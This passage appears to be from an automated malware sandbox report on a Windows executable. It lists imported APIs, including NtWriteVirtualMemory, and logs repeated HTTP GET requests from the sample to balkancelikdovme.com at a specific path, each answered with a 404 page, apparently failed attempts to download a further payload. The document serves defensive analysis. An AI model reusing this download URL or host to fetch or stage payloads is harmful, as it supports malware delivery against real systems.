ole32.dll	CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	GetErrorInfo, GetActiveObject, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
ntdll	NtWriteVirtualMemory, NtProtectVirtualMemory
uRL	TelnetProtocolHandler
ntdll	NtQueryInformationFile, NtOpenFile, NtClose, NtReadFile
ntdll	RtlDosPathNameToNtPathName_U

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2023 20:09:01.970547915 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:02.003756046 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:02.004009008 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:02.004672050 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:02.038544893 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:02.038588047 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:02.078695059 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:02.322402954 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:02.355583906 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:02.395714998 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:02.632672071 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:02.665740967 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:02.706681967 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:02.944396019 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:02.977612019 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:03.017731905 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:03.251517057 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:03.284415007 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:03.324759960 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:03.577011108 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:03.614670992 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:03.654855013 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:03.969207048 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:04.001975060 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:04.042843103 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:04.250616074 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:04.285022974 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:04.325910091 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:04.548708916 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:04.581475973 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:04.621831894 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:04.844924927 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:04.878179073 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:04.918915033 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:05.129462004 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:05.168360949 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:05.207906008 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:05.421052933 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:05.454005003 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:05.493952036 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:05.715500116 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:05.756218910 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:05.796011925 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:06.029077053 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:06.062642097 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:06.103022099 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:06.276963949 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:06.310146093 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:06.350106955 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:06.536585093 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:06.569278002 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:06.610012054 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:06.816421986 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:06.849179029 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:06.890034914 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:07.111725092 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:07.144984961 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:07.186064005 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:07.389780045 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:07.424130917 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:07.464179039 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:07.673188925 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:07.705849886 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:07.746078014 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:07.920247078 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:07.953152895 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:07.993139029 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:08.191725016 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:08.225198030 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:08.266145945 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:08.443737984 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:08.693198919 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:08.993264914 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:09.594364882 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:09.832439899 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:10.237097025 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:10.237451077 CEST	49710	80	192.168.2.4	185.181.116.217
Aug 23, 2023 20:09:10.238718033 CEST	80	49710	185.181.116.217	192.168.2.4
Aug 23, 2023 20:09:10.238784075 CEST	49710	80	192.168.2.4	185.181.116.217

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2023 20:09:01.919686079 CEST	60316	53	192.168.2.4	8.8.8.8
Aug 23, 2023 20:09:01.960266113 CEST	53	60316	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 23, 2023 20:09:01.919686079 CEST	192.168.2.4	8.8.8.8	0xf993	Standard query (0)	balkancelikdovme.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 23, 2023 20:09:01.960266113 CEST	8.8.8.8	192.168.2.4	0xf993	No error (0)	balkancelikdovme.com		185.181.116.217	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

balkancelikdovme.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49710	185.181.116.217	80	C:\Users\user\Desktop\r096teIe1H.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 20:09:02.004672050 CEST	94	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:02.038588047 CEST	95	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:02 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:02.322402954 CEST	95	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:02.355583906 CEST	96	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:02 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:02.632672071 CEST	97	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:02.665740967 CEST	98	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:02 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:02.944396019 CEST	98	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:02.977612019 CEST	99	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:02 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:03.251517057 CEST	99	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:03.284415007 CEST	100	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:03 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 